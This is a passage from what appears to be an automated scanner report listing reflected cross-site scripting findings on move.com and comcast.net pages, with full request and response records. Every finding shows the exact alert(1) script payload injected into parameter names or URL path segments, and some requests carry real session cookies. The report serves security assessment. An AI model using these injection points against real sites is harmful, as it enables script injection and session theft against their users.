<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?e7457--><script>alert(1)</script>71771dcee16=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?e7457-->
...[SNIP]...

2.77. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-buckeye

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 207b1"><script>alert(1)</script>4ee4cd55297 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-18/city-buckeye?207b1"><script>alert(1)</script>4ee4cd55297=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1gfq2255yyjb2pyocnm03245; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=buckeye; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 180468


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?207b1"><script>alert(1)</script>4ee4cd55297=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?207b1">
...[SNIP]...

2.78. http://newhomes.move.com/comcast/communityresults/market-18/city-buckeye [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-18/city-buckeye

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 60fb9--><script>alert(1)</script>bb17cbf6454 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-18/city-buckeye?60fb9--><script>alert(1)</script>bb17cbf6454=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:03 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ujeksd55tey4ds45fumcndyw; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:03 GMT; path=/
Set-Cookie: Personal8549=market=18&state=AZ&searchtext=buckeye; expires=Mon, 19-Dec-2011 18:23:03 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 180585


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?60fb9--><script>alert(1)</script>bb17cbf6454=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?60fb9-->
...[SNIP]...

2.79. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-cumming

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 939a2"><script>alert(1)</script>e5a48127910 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-84/city-cumming?939a2"><script>alert(1)</script>e5a48127910=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:56 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ixvulrjjshyhpl55uv0lr155; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:55 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=cumming; expires=Mon, 19-Dec-2011 18:22:56 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 178455


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?939a2"><script>alert(1)</script>e5a48127910=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?939a2">
...[SNIP]...

2.80. http://newhomes.move.com/comcast/communityresults/market-84/city-cumming [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-cumming

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8eeab--><script>alert(1)</script>e67e3e5ac27 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-84/city-cumming?8eeab--><script>alert(1)</script>e67e3e5ac27=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:01 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=miux5fiavgqssc55vsdsj1fu; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:01 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=cumming; expires=Mon, 19-Dec-2011 18:23:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 177912


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?8eeab--><script>alert(1)</script>e67e3e5ac27=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?8eeab-->
...[SNIP]...

2.81. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-fairburn

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87cb2"><script>alert(1)</script>7ee17c50deb was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-84/city-fairburn?87cb2"><script>alert(1)</script>7ee17c50deb=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:57 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=ynu2qo45clascx550mcaoj55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:57 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=fairburn; expires=Mon, 19-Dec-2011 18:22:57 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174114


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?87cb2"><script>alert(1)</script>7ee17c50deb=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?87cb2">
...[SNIP]...

2.82. http://newhomes.move.com/comcast/communityresults/market-84/city-fairburn [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-84/city-fairburn

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eee0f--><script>alert(1)</script>09637d22ded was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-84/city-fairburn?eee0f--><script>alert(1)</script>09637d22ded=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:23:01 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=q1xasr45fxifggbzycoaffaj; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:23:01 GMT; path=/
Set-Cookie: Personal8549=market=84&state=GA&searchtext=fairburn; expires=Mon, 19-Dec-2011 18:23:01 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 174043


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eee0f--><script>alert(1)</script>09637d22ded=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eee0f-->
...[SNIP]...

2.83. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-88/city-brunswick

Issue detail

The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eceb9--><script>alert(1)</script>5ed8962a388 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /comcast/communityresults/market-88/city-brunswick?eceb9--><script>alert(1)</script>5ed8962a388=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:52 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=vjatx5uqlqfsm355x5tuse55; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:52 GMT; path=/
Set-Cookie: Personal8549=market=88&state=GA&searchtext=brunswick; expires=Mon, 19-Dec-2011 18:22:52 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 70159


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
ast/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/loginmodal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eceb9--><script>alert(1)</script>5ed8962a388=1','/comcast/comcast/loginmodal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/loginmodal','http://newhomes.move.com/Default.aspx?eceb9-->
...[SNIP]...

2.84. http://newhomes.move.com/comcast/communityresults/market-88/city-brunswick [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomes.move.com
Path:   /comcast/communityresults/market-88/city-brunswick

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8f3d6"><script>alert(1)</script>bb971aa3775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /comcast/communityresults/market-88/city-brunswick?8f3d6"><script>alert(1)</script>bb971aa3775=1 HTTP/1.1
Host: newhomes.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 19 Dec 2010 18:22:50 GMT
Server: Microsoft-IIS/6.0
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=zb5gvi55pvzzqgnbdz4mxxal; path=/; HttpOnly
Set-Cookie: showedRecentItems=0; path=/
Set-Cookie: wtfrompage=; expires=Sat, 18-Dec-2010 18:22:50 GMT; path=/
Set-Cookie: Personal8549=market=88&state=GA&searchtext=brunswick; expires=Mon, 19-Dec-2011 18:22:50 GMT; path=/
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 70160


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-us" lang="en-u
...[SNIP]...
gin/popupwindow-false" onclick="AjaxForm.ShowWindow(event,'/comcast/LoginModal/popupwindow-true', 400, 320, '', true, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?8f3d6"><script>alert(1)</script>bb971aa3775=1','/comcast/comcast/LoginModal/popupwindow-true','PPWINSHOW',8549)}, function(){SdcAjaxLog('/comcast/LoginModal','http://newhomes.move.com/Default.aspx?8f3d6">
...[SNIP]...

2.85. http://newhomesresource.move.com/home/default.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://newhomesresource.move.com
Path:   /home/default.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bccb"><script>alert(1)</script>564fcb63a16 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /home/default.asp?2bccb"><script>alert(1)</script>564fcb63a16=1 HTTP/1.1
Host: newhomesresource.move.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 19 Dec 2010 18:13:59 GMT
X-Powered-By: ASP.NET
Content-Length: 6887
Content-Type: text/html
Expires: Sun, 12 Dec 2010 19:33:59 GMT
Set-Cookie: Resource=FirstURL=%2Fhome%2Fdefault%2Easp%3F2bccb%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E564fcb63a16%3D1; path=/
Set-Cookie: ASPSESSIONIDCAADCABR=JFBKCHGCKMIDKNMBIEIOHBPM; path=/
Cache-control: private


           <td width="100%" valign="top">

<html>
<head>
   <title>Move</title>
   <link rel="stylesheet" href="../css/global.css" type="text/css">
   <link rel="stylesheet" href="../css/listings.css" type=
...[SNIP]...
<input type="HIDDEN" name="LoginSource" value="/home/default.asp?2bccb"><script>alert(1)</script>564fcb63a16=1">
...[SNIP]...

2.86. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db79e"><script>alert(1)</script>59b0b45d706 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.netdb79e"><script>alert(1)</script>59b0b45d706/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.netdb79e"><script>alert(1)</script>59b0b45d706/home/L16/2106404168/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.87. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16474"><script>alert(1)</script>d5ba4c93f37 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home16474"><script>alert(1)</script>d5ba4c93f37/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 644
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
<IMG SRC="http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home16474"><script>alert(1)</script>d5ba4c93f37/L16/1495288859/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a?_RM_EMPTY_&" WIDTH=2 HEIGHT=2>

2.88. http://oascentral.comcast.net/RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oascentral.comcast.net
Path:   /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f84a0"><script>alert(1)</script>ca5da6eb0ab was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /RealMedia/ads/adstream_lx.ads/comcast.net/home/L16f84a0"><script>alert(1)</script>ca5da6eb0ab/1147364285/x37/Comcast/CIM_TXT-Pulse360_MKTPLC_HOMEPAGE_rev/TXT-Pulse360_MKTPLC_HOMEPAGE/726e6e65456b7a75345934414371526a HTTP/1.1
Host: oascentral.comcast.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: NSC_d10efm_qppm_iuuq=ffffffff09419e4d45525d5f4f58455e445a4a423660; page_counts=3,2; ev41=%26%23039%3B; s_sq=comcastsearch%3D%2526pid%253Dsearch%252520results%2526pidt%253D1%2526oid%253Dhttp%25253A//comcast.net/%25253FCM.src%25253Dtop%2526ot%253DA; fsr.a=1292781874650; s_lastVisit=11/2010; s_campaign=NET_33_0; mbox=check#true#1292781935|session#1292781870292-178614#1292783735|PC#1292781870292-178614.20#1293991478; s_cc=true; prefs=pagemsg.state=false; fsr.session={"v":1,"rid":"1292781878690_31681","pv":1,"to":3,"c":"http://www.comcast.net/slideshow/entertainment-mostpopulargooglesearches2010/","lc":{"d5":{"v":1,"s":false}},"sd":5}; token=201012191812298752; s_vi=[CS]v1|268717D885010F9F-600001134000CAE0[CE]; OAX=rnneEkzu4Y4ACqRj; VISITORID=1222873154;

Response

HTTP/1.1 200 OK
Date: Sun, 19 Dec 2010 18:08:38 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 645
Keep-Alive: timeout=60
Connection: Keep-Alive
Content-Type: text/plain

<script LANGUAGE="JavaScript1.1">
var fzip = "UNKNOWN"; //default value
if(typeof f_ADTARGET_ZIP != 'undefined') {
zip_token= f_ADTARGET_ZIP.split(":")
fzip = zip_token[1] ;
}
document
...[SNIP]...
